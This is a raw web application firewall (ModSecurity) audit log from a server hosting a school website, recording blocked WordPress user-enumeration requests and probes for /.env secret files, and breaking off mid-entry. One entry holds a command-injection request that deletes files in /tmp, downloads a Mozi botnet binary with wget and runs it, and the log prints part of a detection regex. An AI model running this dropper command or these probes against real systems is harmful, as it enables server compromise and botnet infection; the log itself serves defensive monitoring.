smkn22-jkt.sch.id X-Forwarded-For: 168.253.0.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --99df8134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99df8134-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747720813717980 2786 (- - -) Stopwatch2: 1747720813717980 2786; combined=1240, p1=435, p2=774, p3=0, p4=0, p5=31, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99df8134-Z-- --8e03e30c-A-- [20/May/2025:13:33:41 +0700] aCwiRcXP1sKBAOnOfYMw1QAAAM8 103.236.140.4 55082 103.236.140.4 8181 --8e03e30c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 87.120.119.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 87.120.119.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8e03e30c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e03e30c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747722821983510 3358 (- - -) Stopwatch2: 1747722821983510 3358; combined=1320, p1=444, p2=837, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e03e30c-Z-- --d8f42c51-A-- [20/May/2025:14:03:13 +0700] aCwpMfjdRvl4szSJA_aJPQAAAJE 103.236.140.4 57040 103.236.140.4 8181 --d8f42c51-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 149.104.23.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 149.104.23.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d8f42c51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8f42c51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747724593053947 2722 (- - -) Stopwatch2: 1747724593053947 2722; combined=1479, p1=447, p2=1000, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8f42c51-Z-- --6a209d03-A-- [20/May/2025:14:08:38 +0700] aCwqdoKffmi-VC_l8kRUNwAAAA4 103.236.140.4 59332 103.236.140.4 8181 --6a209d03-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.88 Safari/537.36 Vivaldi/2.4.1488.36 Accept-Charset: utf-8 --6a209d03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a209d03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747724918520104 947 (- - -) Stopwatch2: 1747724918520104 947; combined=414, p1=378, p2=0, p3=0, p4=0, p5=36, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a209d03-Z-- --e199633e-A-- [20/May/2025:14:11:02 +0700] aCwrBsXP1sKBAOnOfYMx0gAAANE 103.236.140.4 59618 103.236.140.4 8181 --e199633e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Safari/537.36 Accept-Charset: utf-8 --e199633e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e199633e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747725062436587 1231 (- - -) Stopwatch2: 1747725062436587 1231; combined=411, p1=363, p2=0, p3=0, p4=0, p5=47, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e199633e-Z-- --c199080c-A-- [20/May/2025:14:31:08 +0700] aCwvvPjdRvl4szSJA_aPGwAAAJU 103.236.140.4 34780 103.236.140.4 8181 --c199080c-B-- GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 120.86.238.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 120.86.238.208 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --c199080c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c199080c-E-- --c199080c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws: cd/tmp rm -rf * wget http://192.168.1.1:8088/mozi.a chmod 777 mozi.a/tmp/mozi.a jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747726268450912 2404 (- - -) Stopwatch2: 1747726268450912 2404; combined=746, p1=462, p2=232, p3=0, p4=0, p5=52, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c199080c-Z-- --1138ef5c-A-- [20/May/2025:14:32:41 +0700] aCwwGfjdRvl4szSJA_aPZwAAAIs 103.236.140.4 35056 103.236.140.4 8181 --1138ef5c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.105.218.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.105.218.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1138ef5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1138ef5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747726361138011 3293 (- - -) Stopwatch2: 1747726361138011 3293; combined=1383, p1=462, p2=892, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1138ef5c-Z-- --df6d4565-A-- [20/May/2025:14:44:53 +0700] aCwy9fjdRvl4szSJA_aRbgAAAIQ 103.236.140.4 40422 103.236.140.4 8181 --df6d4565-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.96.42.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.96.42.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --df6d4565-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df6d4565-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747727093647877 2627 (- - -) Stopwatch2: 1747727093647877 2627; combined=1411, p1=467, p2=913, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df6d4565-Z-- --6b914a41-A-- [20/May/2025:14:57:31 +0700] aCw168XP1sKBAOnOfYM4AwAAAM4 103.236.140.4 42660 103.236.140.4 8181 --6b914a41-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.174.97.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.174.97.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6b914a41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b914a41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747727851539908 3244 (- - -) Stopwatch2: 1747727851539908 3244; combined=1416, p1=480, p2=905, p3=0, p4=0, p5=31, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b914a41-Z-- --b3aaf725-A-- [20/May/2025:15:17:42 +0700] aCw6pvjdRvl4szSJA_aaOQAAAJY 103.236.140.4 41520 103.236.140.4 8181 --b3aaf725-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b3aaf725-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3aaf725-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747729062146105 846 (- - -) Stopwatch2: 1747729062146105 846; combined=351, p1=313, p2=0, p3=0, p4=0, p5=38, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3aaf725-Z-- --5a270143-A-- [20/May/2025:16:11:31 +0700] aCxHQ22BM6ll8T8hTXubigAAAEo 103.236.140.4 37562 103.236.140.4 8181 --5a270143-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.139.50.202 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.139.50.202 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5a270143-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a270143-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747732291340911 2882 (- - -) Stopwatch2: 1747732291340911 2882; combined=1204, p1=440, p2=732, p3=0, p4=0, p5=32, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a270143-Z-- --a9345e1b-A-- [20/May/2025:16:36:58 +0700] aCxNOm2BM6ll8T8hTXudhAAAAEE 103.236.140.4 41844 103.236.140.4 8181 --a9345e1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.72.211.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.72.211.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a9345e1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9345e1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747733818098124 2872 (- - -) Stopwatch2: 1747733818098124 2872; combined=1268, p1=443, p2=793, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9345e1b-Z-- --3435e702-A-- [20/May/2025:17:04:27 +0700] aCxTq22BM6ll8T8hTXudrQAAAFI 103.236.140.4 41990 103.236.140.4 8181 --3435e702-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 205.196.217.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 205.196.217.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3435e702-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3435e702-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747735467837541 3103 (- - -) Stopwatch2: 1747735467837541 3103; combined=1488, p1=479, p2=978, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3435e702-Z-- --a516e611-A-- [20/May/2025:17:26:05 +0700] aCxYvfjdRvl4szSJA_ajngAAAJg 103.236.140.4 42158 103.236.140.4 8181 --a516e611-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.71 Safari/537.36 OPR/63.0.3368.17 (Edition beta) Accept-Charset: utf-8 --a516e611-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a516e611-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747736765862549 891 (- - -) Stopwatch2: 1747736765862549 891; combined=342, p1=299, p2=0, p3=0, p4=0, p5=43, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a516e611-Z-- --da1fc87e-A-- [20/May/2025:18:09:54 +0700] aCxjAvjdRvl4szSJA_akwAAAAIY 103.236.140.4 46158 103.236.140.4 8181 --da1fc87e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.37.250.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.37.250.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --da1fc87e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da1fc87e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747739394710750 2872 (- - -) Stopwatch2: 1747739394710750 2872; combined=1284, p1=451, p2=802, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da1fc87e-Z-- --1ea4e95a-A-- [20/May/2025:18:14:44 +0700] aCxkJG2BM6ll8T8hTXugEAAAAEI 103.236.140.4 46198 103.236.140.4 8181 --1ea4e95a-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 207.154.197.113 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1ea4e95a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ea4e95a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747739684061860 851 (- - -) Stopwatch2: 1747739684061860 851; combined=361, p1=325, p2=0, p3=0, p4=0, p5=35, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ea4e95a-Z-- --f63f0370-A-- [20/May/2025:19:19:28 +0700] aCxzUPjdRvl4szSJA_ak4QAAAI0 103.236.140.4 46526 103.236.140.4 8181 --f63f0370-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.173.45.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.173.45.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f63f0370-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f63f0370-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747743568545624 2542 (- - -) Stopwatch2: 1747743568545624 2542; combined=1140, p1=387, p2=725, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f63f0370-Z-- --8c298861-A-- [20/May/2025:20:07:57 +0700] aCx-rW2BM6ll8T8hTXuhaAAAAEo 103.236.140.4 49324 103.236.140.4 8181 --8c298861-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 134.122.126.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 134.122.126.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8c298861-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c298861-H-- Message: Access denied with code 403 (phase 2). Operator 